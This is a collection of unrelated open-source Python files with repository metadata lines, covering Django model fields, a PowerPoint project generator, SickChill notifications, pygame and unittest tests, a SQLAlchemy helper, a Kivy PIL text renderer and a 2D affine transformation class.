def __init__(self, verbose_name=None, name=None, auto_now=False,
auto_now_add=False, **kwargs):
self.auto_now, self.auto_now_add = auto_now, auto_now_add
if auto_now or auto_now_add:
kwargs['editable'] = False
kwargs['blank'] = True
super(TimeField, self).__init__(verbose_name, name, **kwargs)
def _check_fix_default_value(self):
"""
Adds a warning to the checks framework stating, that using an actual
time or datetime value is probably wrong; it's only being evaluated on
server start-up.
For details see ticket #21905
"""
if not self.has_default():
return []
now = timezone.now()
if not timezone.is_naive(now):
now = timezone.make_naive(now, timezone.utc)
value = self.default
if isinstance(value, datetime.datetime):
second_offset = datetime.timedelta(seconds=10)
lower = now - second_offset
upper = now + second_offset
if timezone.is_aware(value):
value = timezone.make_naive(value, timezone.utc)
elif isinstance(value, datetime.time):
second_offset = datetime.timedelta(seconds=10)
lower = now - second_offset
upper = now + second_offset
value = datetime.datetime.combine(now.date(), value)
if timezone.is_aware(value):
value = timezone.make_naive(value, timezone.utc).time()
else:
# No explicit time / datetime value -- no checks necessary
return []
if lower <= value <= upper:
return [
checks.Warning(
'Fixed default value provided.',
hint='It seems you set a fixed date / time / datetime '
'value as default for this field. This may not be '
'what you want. If you want to have the current date '
'as default, use `django.utils.timezone.now`',
obj=self,
id='fields.W161',
)
]
return []
def deconstruct(self):
name, path, args, kwargs = super(TimeField, self).deconstruct()
if self.auto_now is not False:
kwargs["auto_now"] = self.auto_now
if self.auto_now_add is not False:
kwargs["auto_now_add"] = self.auto_now_add
if self.auto_now or self.auto_now_add:
del kwargs['blank']
del kwargs['editable']
return name, path, args, kwargs
def get_internal_type(self):
return "TimeField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, datetime.time):
return value
if isinstance(value, datetime.datetime):
# Not usually a good idea to pass in a datetime here (it loses
# information), but this can be a side-effect of interacting with a
# database backend (e.g. Oracle), so we'll be accommodating.
return value.time()
try:
parsed = parse_time(value)
if parsed is not None:
return parsed
except ValueError:
raise exceptions.ValidationError(
self.error_messages['invalid_time'],
code='invalid_time',
params={'value': value},
)
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = datetime.datetime.now().time()
setattr(model_instance, self.attname, value)
return value
else:
return super(TimeField, self).pre_save(model_instance, add)
def get_prep_value(self, value):
value = super(TimeField, self).get_prep_value(value)
return self.to_python(value)
def get_db_prep_value(self, value, connection, prepared=False):
# Casts times into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.adapt_timefield_value(value)
def value_to_string(self, obj):
val = self.value_from_object(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.TimeField}
defaults.update(kwargs)
return super(TimeField, self).formfield(**defaults)
class URLField(CharField):
default_validators = [validators.URLValidator()]
description = _("URL")
def __init__(self, verbose_name=None, name=None, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 200)
super(URLField, self).__init__(verbose_name, name, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(URLField, self).deconstruct()
if kwargs.get("max_length") == 200:
del kwargs['max_length']
return name, path, args, kwargs
def formfield(self, **kwargs):
# As with CharField, this will cause URL validation to be performed
# twice.
defaults = {
'form_class': forms.URLField,
}
defaults.update(kwargs)
return super(URLField, self).formfield(**defaults)
class BinaryField(Field):
description = _("Raw binary data")
empty_values = [None, b'']
def __init__(self, *args, **kwargs):
kwargs['editable'] = False
super(BinaryField, self).__init__(*args, **kwargs)
if self.max_length is not None:
self.validators.append(validators.MaxLengthValidator(self.max_length))
def deconstruct(self):
name, path, args, kwargs = super(BinaryField, self).deconstruct()
del kwargs['editable']
return name, path, args, kwargs
def get_internal_type(self):
return "BinaryField"
def get_placeholder(self, value, compiler, connection):
return connection.ops.binary_placeholder_sql(value)
def get_default(self):
if self.has_default() and not callable(self.default):
return self.default
default = super(BinaryField, self).get_default()
if default == '':
return b''
return default
def get_db_prep_value(self, value, connection, prepared=False):
value = super(BinaryField, self).get_db_prep_value(value, connection, prepared)
if value is not None:
return connection.Database.Binary(value)
return value
def value_to_string(self, obj):
"""Binary data is serialized as base64"""
return b64encode(force_bytes(self.value_from_object(obj))).decode('ascii')
def to_python(self, value):
# If it's a string, it should be base64-encoded data
if isinstance(value, six.text_type):
return six.memoryview(b64decode(force_bytes(value)))
return value
class UUIDField(Field):
default_error_messages = {
'invalid': _("'%(value)s' is not a valid UUID."),
}
description = 'Universally unique identifier'
empty_strings_allowed = False
def __init__(self, verbose_name=None, **kwargs):
kwargs['max_length'] = 32
super(UUIDField, self).__init__(verbose_name, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(UUIDField, self).deconstruct()
del kwargs['max_length']
return name, path, args, kwargs
def get_internal_type(self):
return "UUIDField"
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
if not isinstance(value, uuid.UUID):
value = self.to_python(value)
if connection.features.has_native_uuid_field:
return value
return value.hex
def to_python(self, value):
if value is not None and not isinstance(value, uuid.UUID):
try:
return uuid.UUID(value)
except (AttributeError, ValueError):
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
return value
def formfield(self, **kwargs):
defaults = {
'form_class': forms.UUIDField,
}
defaults.update(kwargs)
return super(UUIDField, self).formfield(**defaults)
| SantosDevelopers/sborganicos | venv/lib/python3.5/site-packages/django/db/models/fields/__init__.py | Python | mit | 88,153 |
from coati.powerpoint import open_pptx, runpowerpoint
import os
import sys
import logging
from shutil import copyfile
from colorlog import ColoredFormatter
LOG_LEVEL = logging.DEBUG
LOGFORMAT = "%(asctime)s - %(log_color)s%(message)s"
logging.root.setLevel(LOG_LEVEL)
formatter = ColoredFormatter(LOGFORMAT)
stream = logging.StreamHandler()
stream.setLevel(LOG_LEVEL)
stream.setFormatter(formatter)
log = logging.getLogger('pythonConfig')
log.setLevel(LOG_LEVEL)
log.addHandler(stream)
this_dir = os.path.dirname(__file__)
template_path = os.path.join(this_dir, 'templates/slide_template.txt')
config_template_path = os.path.join(this_dir, 'templates/config_template.txt')
init_template_path = os.path.join(this_dir, 'templates/init_template.txt')
def _get_slides_shapes(ppt_path):
pptapp = runpowerpoint()
pptFile = open_pptx(pptapp, ppt_path)
log.debug('Open Template successfully...')
all_slide_shapes = []
for slide in pptFile.Slides:
shapes_in_slide = _get_shapes_in_slide(slide)
all_slide_shapes.append(shapes_in_slide)
pptFile.close()
pptapp.Quit()
log.debug('Finish reading template...')
return all_slide_shapes
def _get_shapes_in_slide(slide):
shapes_in_slide = {each_shape.name: () for each_shape in slide.shapes}
return shapes_in_slide
def _generate_path(p):
if not os.path.exists(os.path.dirname(p)):
try:
os.makedirs(os.path.dirname(p))
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
def _cp(src, dst, fn):
source = open(src, 'r')
result = fn(source.read())
destination = open(dst, 'w')
destination.write(result)
source.close
destination.close
def _insert_code(complete_text, text_to_insert, text_to_replace):
ans = complete_text.replace(text_to_replace, text_to_insert)
return ans
def _file_exists(ppt_path):
if not (ppt_path.endswith('.pptx') or ppt_path.endswith('.ppt')):
sys.exit('The file provided is not a PPT file')
elif not os.path.isfile(ppt_path):
sys.exit('The PPT file provided doesnt exist or is damaged')
pass
def generate(project_name, ppt_path):
_file_exists(ppt_path)
path = os.path.abspath(project_name)
spaces = " " * 12
slide_tuples = '['
#Generate builders/ folder prior slides creation
path_builders = os.path.join(path, 'builders/')
_generate_path(path_builders)
log.info('create folder %s', "./builders/")
for i, slide in enumerate(_get_slides_shapes(ppt_path)):
slide_name = 'slide' + str(i+1)
filename = path_builders + slide_name + '.py';
#Create slide#.py with the template info
_cp(template_path, filename, lambda source: _insert_code(
source,
str(slide).replace(", ",",\n" + spaces),
'"_-{}-_"'))
log.info('create %s', filename)
#This line is in the for loop cause is gathering info for the config.py
slide_tuples += ('\n' + spaces if i != 0 else '') + '(' + str(i+1) + ', ' + slide_name + '.build()),'
#Generate config.py with already gathered info in slide_tuples
config_filename = path + '/config.py'
_cp(config_template_path, config_filename, lambda source: _insert_code(
source,
(slide_tuples[:-1] + ']'),
'"_-{}-_"'))
log.info('create %s', config_filename)
#Create __init__ in builders
init_file = path + '/builders/__init__.py'
copyfile(init_template_path, init_file)
log.info('create %s', init_file)
#Copy original template file
copy_ppt = path + '/' + str(os.path.split(ppt_path)[-1])
_cp(ppt_path, copy_ppt , lambda source: source)
log.info('copy %s', copy_ppt)
#Add images folder
_generate_path(os.path.join(path, 'images/'))
log.info('create folder %s', "./images/")
| Intelimetrica/coati | coati/generator.py | Python | mit | 3,847 |
# coding=utf-8
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickchill.github.io
#
# This file is part of SickChill.
#
# SickChill is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickChill is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickChill. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import, print_function, unicode_literals
# Stdlib Imports
import datetime
# First Party Imports
import sickbeard
MESSAGE = 'notice'
ERROR = 'error'
class Notifications(object):
"""
A queue of Notification objects.
"""
def __init__(self):
self._messages = []
self._errors = []
def message(self, title, message=''):
"""
Add a regular notification to the queue
title: The title of the notification
message: The message portion of the notification
"""
self._messages.append(Notification(title, message, MESSAGE))
def error(self, title, message=''):
"""
Add an error notification to the queue
title: The title of the notification
message: The message portion of the notification
"""
self._errors.append(Notification(title, message, ERROR))
def get_notifications(self, remote_ip='127.0.0.1'):
"""
Return all the available notifications in a list. Marks them all as seen
as it returns them. Also removes timed out Notifications from the queue.
Returns: A list of Notification objects
"""
# filter out expired notifications
self._errors = [x for x in self._errors if not x.is_expired()]
self._messages = [x for x in self._messages if not x.is_expired()]
# return any notifications that haven't been shown to the client already
return [x.see(remote_ip) for x in self._errors + self._messages if x.is_new(remote_ip)]
# static notification queue object
notifications = Notifications()
class Notification(object):
"""
Represents a single notification. Tracks its own timeout and a list of which clients have
seen it before.
"""
def __init__(self, title, message='', type=None, timeout=None):
self.title = title
self.message = message
self._when = datetime.datetime.now()
self._seen = []
if type:
self.type = type
else:
self.type = MESSAGE
if timeout:
self._timeout = timeout
else:
self._timeout = datetime.timedelta(minutes=1)
def is_new(self, remote_ip='127.0.0.1'):
"""
Returns True if the notification hasn't been displayed to the current client (aka IP address).
"""
return remote_ip not in self._seen
def is_expired(self):
"""
Returns True if the notification is older than the specified timeout value.
"""
return datetime.datetime.now() - self._when > self._timeout
def see(self, remote_ip='127.0.0.1'):
"""
Returns this notification object and marks it as seen by the client ip
"""
self._seen.append(remote_ip)
return self
class ProgressIndicator(object):
def __init__(self, percentComplete=0, currentStatus=None):
self.percentComplete = percentComplete
self.currentStatus = currentStatus or {'title': ''}
class ProgressIndicators(object):
_pi = {'massUpdate': [],
'massAdd': [],
'dailyUpdate': []
}
@staticmethod
def getIndicator(name):
if name not in ProgressIndicators._pi:
return []
# if any of the progress indicators are done take them off the list
for curPI in ProgressIndicators._pi[name]:
if curPI is not None and curPI.percentComplete() == 100:
ProgressIndicators._pi[name].remove(curPI)
# return the list of progress indicators associated with this name
return ProgressIndicators._pi[name]
@staticmethod
def setIndicator(name, indicator):
ProgressIndicators._pi[name].append(indicator)
class QueueProgressIndicator(object):
"""
A class used by the UI to show the progress of the queue or a part of it.
"""
def __init__(self, name, queueItemList):
self.queueItemList = queueItemList
self.name = name
def numTotal(self):
return len(self.queueItemList)
def numFinished(self):
return len([x for x in self.queueItemList if not x.is_in_queue()])
def numRemaining(self):
return len([x for x in self.queueItemList if x.is_in_queue()])
def nextName(self):
for curItem in [sickbeard.showQueueScheduler.action.currentItem] + sickbeard.showQueueScheduler.action.queue: # @UndefinedVariable
if curItem in self.queueItemList:
return curItem.name
return "Unknown"
def percentComplete(self):
numFinished = self.numFinished()
numTotal = self.numTotal()
if numTotal == 0:
return 0
else:
return int(float(numFinished) / float(numTotal) * 100)
class LoadingTVShow(object):
def __init__(self, dir):
self.dir = dir
self.show = None
| coderbone/SickRage-alt | sickbeard/ui.py | Python | gpl-3.0 | 5,666 |
import unittest
from tests.core.torrentclient_tests import TorrentClientTest
def suite():
tests = ['test_get_save_path']
return unittest.TestSuite(map(TorrentClientTest, tests))
clientTestSuite = suite()
unittest.TextTestRunner(clientTestSuite)
if __name__ == '__main__':
unittest.main()
| marcosflp/torrents_and_subtitles_downloader | run_tests.py | Python | mit | 306 |
import unittest
import pygame.constants
class KmodTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.constants = [
'KMOD_NONE',
'KMOD_LSHIFT',
'KMOD_RSHIFT',
'KMOD_LCTRL',
'KMOD_RCTRL',
'KMOD_LALT',
'KMOD_RALT',
'KMOD_LMETA',
'KMOD_RMETA',
'KMOD_NUM',
'KMOD_CAPS',
'KMOD_MODE',
'KMOD_CTRL',
'KMOD_SHIFT',
'KMOD_ALT',
'KMOD_META',
]
if pygame.get_sdl_version()[0] >= 2:
cls.constants.extend([
'KMOD_LGUI',
'KMOD_RGUI',
'KMOD_GUI',
])
def test_kmod_existence(self):
for k in self.constants:
self.assertTrue(hasattr(pygame.constants, k), 'missing constant {}'.format(k))
def test_kmod_types(self):
for k in self.constants:
self.assertEqual(type(getattr(pygame.constants, k)), int)
class KeyConstantTests(unittest.TestCase):
def test_letters(self):
for c in range(ord('a'), ord('z') + 1):
c = chr(c)
self.assertTrue(hasattr(pygame.constants, 'K_%s' % c),
'missing constant: K_%s' % c)
################################################################################
if __name__ == '__main__':
unittest.main()
| mark-me/Pi-Jukebox | venv/Lib/site-packages/pygame/tests/constants_test.py | Python | agpl-3.0 | 1,445 |
# -*- coding: utf-8 -*-
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import as_declarative
import settings
def db_connect():
""" Performs database connection using database settings from settings.py.
:return: sqlalchemy engine instance
"""
# return create_engine('sqlite:///images.db', echo=True)
return create_engine('{drivername}://{username}:{password}@{host}:{port}/{database}'\
.format(**settings.DATABASES['sqlalchemy'])
)
engine = db_connect()
session_maker = sessionmaker()
@as_declarative()
class Base(object):
def __init__(self):
self.conn = engine.connect()
self.session = session_maker(bind=self.conn)
self.close()
def open(self):
self.conn = engine.connect()
self.session = session_maker(bind=self.conn)
def close(self):
self.session.close()
self.conn.close()
engine.dispose()
| drewdru/AutoTags | vk_base/models/modelsHelper.py | Python | gpl-3.0 | 984 |
'''
Text PIL: Draw text with PIL
'''
__all__ = ('LabelPIL', )
try:
from PIL import Image, ImageFont, ImageDraw
except:
raise
from kivy.compat import text_type
from kivy.core.text import LabelBase
from kivy.core.image import ImageData
# used for fetching extends before creature image surface
default_font = ImageFont.load_default()
class LabelPIL(LabelBase):
_cache = {}
def _select_font(self):
fontsize = int(self.options['font_size'])
fontname = self.options['font_name_r']
try:
id = '%s.%s' % (text_type(fontname), text_type(fontsize))
except UnicodeDecodeError:
id = '%s.%s' % (fontname, fontsize)
if not id in self._cache:
font = ImageFont.truetype(fontname, fontsize)
self._cache[id] = font
return self._cache[id]
def get_extents(self, text):
font = self._select_font()
w, h = font.getsize(text)
return w, h
def get_cached_extents(self):
return self._select_font().getsize
def _render_begin(self):
# create a surface, context, font...
self._pil_im = Image.new('RGBA', self._size)
self._pil_draw = ImageDraw.Draw(self._pil_im)
def _render_text(self, text, x, y):
color = tuple([int(c * 255) for c in self.options['color']])
self._pil_draw.text((int(x), int(y)),
text, font=self._select_font(), fill=color)
def _render_end(self):
data = ImageData(self._size[0], self._size[1],
self._pil_im.mode.lower(), self._pil_im.tostring())
del self._pil_im
del self._pil_draw
return data
| BillBillBillBill/Tickeys-linux | tickeys/kivy_32/kivy/core/text/text_pil.py | Python | mit | 1,686 |
"""
Contains class Affine2D for preforming affine transformation (general linear
transformation followed by translation) on points (vectors) in 2D.
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id: affine_2d.py 1311 2016-06-13 12:41:50Z vladan $
"""
__version__ = "$Revision: 1311 $"
import logging
import numpy
import scipy
import scipy.linalg as linalg
from points import Points
from affine import Affine
class Affine2D(Affine):
"""
Finds and preforms affine transformation (general linear transformation
followed by translation) on points (vectors) in 2D.
The transformation that transforms points x to points y has the following
form:
y = gl x + d
where:
gl = q s p m
Main methods:
- find: finds a transformation between two sets of points
- transform: transforms a (set of) point(s)
- inverse: calculates inverse transformation
- compose: composition of two transformations
Important attributes and properties (see formulas above):
- d: translation vector
- gl: general linear transformation matrix
- q: rotation matrix
- phi: rotational angle (radians)
- phiDeg: rotational angle (degrees)
- s: scaling matrix (diagonal)
- scale: vector of scaling parameters (diagonal of s)
- p: parity matrix (diagonal)
- parity: parity (+1 or -1)
- m: shear matrix (upper-triangular)
- error: error of transformation for all points
- rmsError: root mean square error of the transformation
"""
def __init__(self, d=None, gl=None, phi=None, scale=None,
parity=1, shear=0, order='qpsm', xy_axes='point_dim'):
"""
Initialization. Following argument combinations are valid:
- no arguments: no transformation matrices are initialized
- d and gl: d and gl are set
- d, phi and scale (parity and shear optional): d and gl
(gl = q p s m) are set
If arg d is None it is set to [0, 0]. If it is a single number it is
set to the same value in both directions.
If the arg xy_axes is 'point_dim' / 'dim_point', points used in this
instance should be specified as n_point x 2 / 2 x n_point
matrices.
Arguments
- gl: gl matrix
- phi: angle
- scale: single number or 1d array
- parity: 1 or -1
- shear: (number) shear
- d: single number, 1d array, or None (means 0)
- order: decomposition order
- xy_axes: order of axes in matrices representing points, can be
'point_dim' (default) or 'dim_point'
"""
# set d
if d is None:
d = 0
if not isinstance(d, (numpy.ndarray, list)):
d = self.makeD(d)
if (gl is not None) and (d is not None):
super(self.__class__, self).__init__(
gl, d, order=order, xy_axes=xy_axes)
elif (phi is not None) and (scale is not None) and (d is not None):
if not isinstance(scale, (numpy.ndarray, list)):
scale = self.makeS(scale)
elif isinstance(scale, numpy.adarray) and (len(scale.shape) == 1):
scale = self.makeS(scale)
elif isinstance(scale, list) and not isinstance(scale[0], list):
scale = self.makeS(scale)
qp = numpy.inner(self.makeQ(phi), self.makeP(parity))
sm = numpy.inner(scale, self.makeM(shear))
gl = numpy.inner(qp, sm)
super(self.__class__, self).__init__(
gl, d, order=order, xy_axes=xy_axes)
else:
raise ValueError("Transformation could not be created because "
+ " not enough parameters were specified.")
@classmethod
def downcast(cls, affine):
"""
Returns instance of this class that was obtained by dowoncasting
art affine (instance of Affine, base class of this class).
Argument:
- affine: instance of Affine
"""
# copy gl and d, obligatory
new = cls(gl=affine.gl, d=affine.d, xy_axes=affine.xy_axes)
# copy attributes that are not obligarory
for name in ['order', 'resids', 'rank', 'singular', 'error', '_xPrime',
'_yPrime', 'q', 'p', 's', 'm', 'xy_axes']:
try:
value = getattr(affine, name)
setattr(new, name, value)
except AttributeError:
pass
return new
##############################################################
#
# Parameters
#
@classmethod
def identity(cls, ndim=2):
"""
Returnes an identity object of this class, that is a transformation
that leaves all vectors invariant.
Argument ndim is ignored, it should be 2 here.
"""
obj = cls.__base__.identity(ndim=2)
return obj
@classmethod
def makeQ(cls, phi):
"""
Returns rotation matrix corresponding to angle phi
"""
q = numpy.array([[numpy.cos(phi), -numpy.sin(phi)],
[numpy.sin(phi), numpy.cos(phi)]])
return q
@classmethod
def getAngle(cls, q):
"""
Returns angle corresponding to the rotation matrix specified by arg q
"""
res = numpy.arctan2(q[1,0], q[0,0])
return res
@classmethod
def makeS(cls, scale):
"""
Returns scale transformation corresponding to 1D array scale.
Argument:
- scale: can be given as an 1d array (or a list), or as a single
number in which case the scale is the same in all directions
"""
s = cls.__base__.makeS(scale=scale, ndim=2)
return s
@classmethod
def makeP(cls, parity, axis=-1):
"""
Returns parity matrix corresponding to arg parity.
If parity is -1, the element of the parity matrix corresponding to
axis is set to -1 (all other are 1).
Arguments:
- parity: can be 1 or -1
- axis: axis denoting parity element that can be -1
"""
p = cls.__base__.makeP(parity=parity, axis=axis, ndim=2)
return p
@classmethod
def makeM(cls, shear):
"""
Returns share matrix corresponding to (arg) shear.
"""
m = numpy.array([[1, shear],
[0, 1]])
return m
@classmethod
def makeD(cls, d):
"""
Returns d (translation) array corresponding to arg parity.
Arguments:
- d: (single number) translation
"""
d = cls.__base__.makeD(d, ndim=2)
return d
def getPhi(self):
"""
Rotation angle of matrix self.q in radians.
"""
#try:
# qq = self.q
#except AttributeError:
# self.decompose(order='qpsm')
res = numpy.arctan2(self.q[1,0], self.q[0,0])
return res
def setPhi(self, phi):
"""
Sets transformation matrices related to phi (q and gl). Matrix gl is
calculated using the current values of other matrices (p, s and m).
"""
self.q = self.makeQ(phi)
try:
gg = self.gl
self.gl = self.composeGl()
except AttributeError:
pass
phi = property(fget=getPhi, fset=setPhi, doc='Rotation angle in radians')
def getPhiDeg(self):
"""
Rotation angle in degrees
"""
res = self.phi * 180 / numpy.pi
return res
def setPhiDeg(self, phi):
"""
Sets transformation matrices related to phi (q and gl). Matrix gl is
calculated using the current values of other matrices (p, s and m).
"""
phi_rad = phi * numpy.pi / 180
self.q = self.makeQ(phi_rad)
try:
gg = self.gl
self.gl = self.composeGl()
except AttributeError:
pass
phiDeg = property(fget=getPhiDeg, fset=setPhiDeg,
doc='Rotation angle in degrees')
def getUAngle(self):
"""
Returns angle alpha corresponding to rotation matrix self.u
"""
return self.getAngle(q=self.u)
def setUAngle(self, angle):
"""
Sets U matrix (as in usv decomposition) and adjusts gl.
"""
self.u = self.makeQ(angle)
self.gl = self.composeGl()
uAngle = property(fget=getUAngle, fset=setUAngle,
doc='Rotation angle corresponding to matrix U in radians')
def getUAngleDeg(self):
"""
Returns angle alpha corresponding to rotation matrix self.u
"""
res = self.getAngle(q=self.u) * 180 / numpy.pi
return res
def setUAngleDeg(self, angle):
"""
Sets U matrix (as in usv decomposition) and adjusts gl.
"""
angle_rad = angle * numpy.pi / 180
self.u = self.makeQ(angle_rad)
self.gl = self.composeGl()
uAngleDeg = property(fget=getUAngleDeg, fset=setUAngleDeg,
doc='Rotation angle corresponding to matrix U in degrees')
def getVAngle(self):
"""
Returns angle alpha corresponding to rotation matrix self.v
"""
return self.getAngle(q=self.v)
def setVAngle(self, angle):
"""
Sets V matrix (as in usv decomposition) and adjusts gl.
"""
self.v = self.makeQ(angle)
self.gl = self.composeGl()
vAngle = property(fget=getVAngle, fset=setVAngle,
doc='Rotation angle corresponding to matrix V in radians')
def getVAngleDeg(self):
"""
Returns angle alpha corresponding to rotation matrix self.v
"""
res = self.getAngle(q=self.v) * 180 / numpy.pi
return res
def setVAngleDeg(self, angle):
"""
Sets V matrix (as in usv decomposition) and adjusts gl.
"""
angle_rad = angle * numpy.pi / 180
self.v = self.makeQ(angle_rad)
self.gl = self.composeGl()
vAngleDeg = property(fget=getVAngleDeg, fset=setVAngleDeg,
doc='Rotation angle corresponding to matrix V in degrees')
def getScaleAngle(self):
"""
Returns angle (in rad) that corresponds to the scaling:
arccos(scale_smaller / scale_larger)
where scale_smaller and scale_larger are the smaller and larger scale
factors, respectively.
Rotation of an 2D object by this angle around x-axis in 3D is eqivalent
to scaling this object by self.scale (up to a common scale factor).
"""
ratio = self.scale[1] / self.scale[0]
if ratio > 1:
ratio = 1. / ratio
res = numpy.arccos(ratio)
return res
scaleAngle = property(
fget=getScaleAngle,
doc='Angle corresponding to the ratio of scales (in rad)')
def getScaleAngleDeg(self):
"""
Returns angle in degrees that corresponds to the scaling:
arccos(scale[1]/scale[0])
Rotation of an 2D object by this angle around x-axis in 3D is eqivalent
to scaling this object by self.scale (up to a common scale factor).
"""
return self.scaleAngle * 180 / numpy.pi
scaleAngleDeg = property(
fget=getScaleAngleDeg,
doc='Angle corresponding to the ratio of scales in degrees')
def getShear(self):
"""
Shear
"""
try:
mm = self.m
except AttributeError:
self.decompose()
res = self.m[0, 1]
return res
shear = property(fget=getShear, doc='Shear')
##############################################################
#
# Finding and applying transformations
#
@classmethod
def find(
cls, x, y, x_ref='cm', y_ref='cm', type_='gl', xy_axes='point_dim'):
"""
Finds affine transformation (general linear transformation folowed by a
translation) that minimizes square error for transforming points x to
points y in 2D. The transformation has the form
y = gl x + d, (1)
and:
gl = q s p m for type_='gl'
gl = S q p for type_='rs'
where d is translation vector, q, s, p and m are rotation, scaling,
parity and shear matrices, respectivly and S is a scalar scale (same
for both directions)
In the default mode (x_ref='cm' and y_ref='cm') the parameters are
calculated by minimizing square error to get gl from:
y - y_cm = gl (x - x_cm) and d = y_cm - gl x_cm
where x_cm and y_cm are the centers of mass for x and y respectivly.
In this case the square error of eq 1 is minimized
In case args x_ref and y_ref are coordinates, gl is determined by
minimizing square error in:
y - y_ref = gl (x - x_ref) and d = y_ref - gl x_ref
Note that in this case the parameters found do not minimize the error
of eq 1.
In case type_='gl', general linear transformation (matrix gl) is
calculated using Affine.find which in turn uses scipy.linalg.lstsq.
Alternatively, if type_='rs', rotation angle parity and scale are
calculated using findRS() method.
Arguments:
- x, y: sets of points, both having shape (n_points, n_dim)
- x_ref, y_ref: (ndarray) coordinates of reference points, or 'cm' to
use center of mass
Returns the transformation found as an instance of class cls, with
following attributes:
- gl: general linear transformation matrix
- d: translation vector
- q, p, s, m: rotation, parity, scale and shear matrices
- error: difference between y and transformed x values
- resids, rank, singular: values returned from scipy.linalg.lstsq
- _xPrime: x - x_ref
- _yPrime: y - y_ref
- type_: type of the optimization, 'gl' to find Gl transformation
that optimizes the square error, or 'rs' to find the best rotation
and one scale (currently implemented for 2D transformations only)
"""
if type_ == 'gl':
# run Affine.base and downcast
base_inst = cls.__base__.find(
x=x, y=y, x_ref=x_ref, y_ref=y_ref, xy_axes=xy_axes)
inst = cls.downcast(affine=base_inst)
elif type_ == 'rs':
# call special method for 'rs' type in 2D
inst = cls.findRS(
x=x, y=y, x_ref=x_ref, y_ref=y_ref, xy_axes=xy_axes)
else:
raise ValueError("Argument type_: ", type_, "was not ",
"understood. Valid values are 'gl', and 'rs'.")
return inst
@classmethod
def findRS(cls, x, y, x_ref='cm', y_ref='cm', xy_axes='point_dim'):
"""
Finds transformation consisting of rotation, single scale factor and
translation in 2D that minimizes square error for transforming points
x to points y. The transformation has the form
y = gl x + d, gl = S q p (1)
where d is translation vector, q and p are rotation and parity
matrices, respectivly and S is a scalar scale (same for both
directions)
In the default mode (x_ref='cm' and y_ref='cm') the parameters are
calculated by minimizing square error to get gl from:
y - y_cm = gl (x - x_cm) and d = y_cm - gl x_cm
where x_cm and y_cm are the centers of mass for x and y respectivly.
In this case the square error of eq 1 is minimized
In case args x_ref and y_ref are coordinates, gl is determined by
minimizing square error in:
y - y_ref = gl (x - x_ref) and d = y_ref - gl x_ref
Note that in this case the parameters found do not minimize the error
of eq 1.
In center of mass coordinates, scale and parity are calculated
directly using:
S = sqrt( det(yx) / det(xx) )
P = sign( det(yx) / det(xx) )
Rotation angle is calculated so that the square error is minimized:
tan(phi + pi/2) = tr(y p x) / tr(y r0 p x)
where:
r0 = 0 -1
1 0
Arguments:
- x, y: sets of points, both having shape (n_points, n_dim)
- x_ref, y_ref: (ndarray) coordinates of reference points, or 'cm' to
use center of mass
Returns the transformation found as an instance of class cls, with
following attributes:
- gl: general linear transformation matrix
- d: translation vector
- q, p, s, m: rotation, parity, scale and shear matrices
- error: difference between y and transformed x values
- resids, rank, singular: values returned from scipy.linalg.lstsq
Note: To be replaced by SVD based method
"""
# bring x and y to n_points x n_dim shape
if xy_axes == 'point_dim':
pass
elif xy_axes == 'dim_point':
x = x.transpose()
y = y.transpose()
else:
raise ValueError(
"Argument xy_axes was not understood. Possible values are: "
+ "'point_dim' and 'dim_point'.")
# bring x to reference frame
if isinstance(x_ref, str) and (x_ref == 'cm'):
x_ref = numpy.mean(x, axis=0)
elif isinstance(x_ref, (list, tuple, numpy.ndarray)):
pass
else:
raise ValueError(\
'Argument x_ref: ', x_ref, ' was not understood.',
" Allowed values are None, 'cm', or an array.")
x_prime = x - x_ref
# bring y to reference frame
if isinstance(y_ref, str) and (y_ref == 'cm'):
y_ref = numpy.mean(y, axis=0)
elif isinstance(y_ref, (list, tuple, numpy.ndarray)):
pass
else:
raise ValueError(\
'Argument y_ref: ', y_ref, ' was not understood.',
" Allowed values are None, 'cm', or an array.")
y_prime = y - y_ref
# find parity and scale
det_xy = linalg.det(numpy.dot(x_prime.transpose(), y_prime))
det_xx = linalg.det(numpy.dot(x_prime.transpose(), x_prime))
parity = numpy.sign(det_xy * det_xx)
scale = numpy.sqrt(parity * det_xy / float(det_xx))
p = numpy.array([[1, 0], [0, parity]])
s = numpy.diag([scale, scale])
# find phi
px = numpy.inner(x_prime, p)
ypx = (y_prime * px).sum()
s2 = numpy.array([[0, -1], [1, 0]])
ys2px = (numpy.dot(y_prime, s2) * px).sum()
phi = numpy.arctan2(-ypx, float(ys2px)) + numpy.pi / 2
# q (rotation matrix)
q = numpy.array([[numpy.cos(phi), -numpy.sin(phi)],
[numpy.sin(phi), numpy.cos(phi)]])
# check +pi ambiguity of phi
yqpx = (numpy.dot(y_prime, q) * numpy.inner(x_prime, p)).sum()
if yqpx < 0:
phi += numpy.pi
q = cls.getQ(phi)
# get gl and d and instantiate
gl = numpy.dot(numpy.dot(q, s), p)
d = y_ref - numpy.inner(x_ref, gl)
inst = cls(gl=gl, d=d)
inst.xy_axes = xy_axes
# get error
inst.error = y - inst.transform(x, xy_axes='point_dim')
if xy_axes == 'dim_point':
inst.error = inst.error.transpose()
# save transformations
inst.q = q
inst.s = s
inst.p = p
inst.m = numpy.identity(2)
#inst.gl = gl
return inst
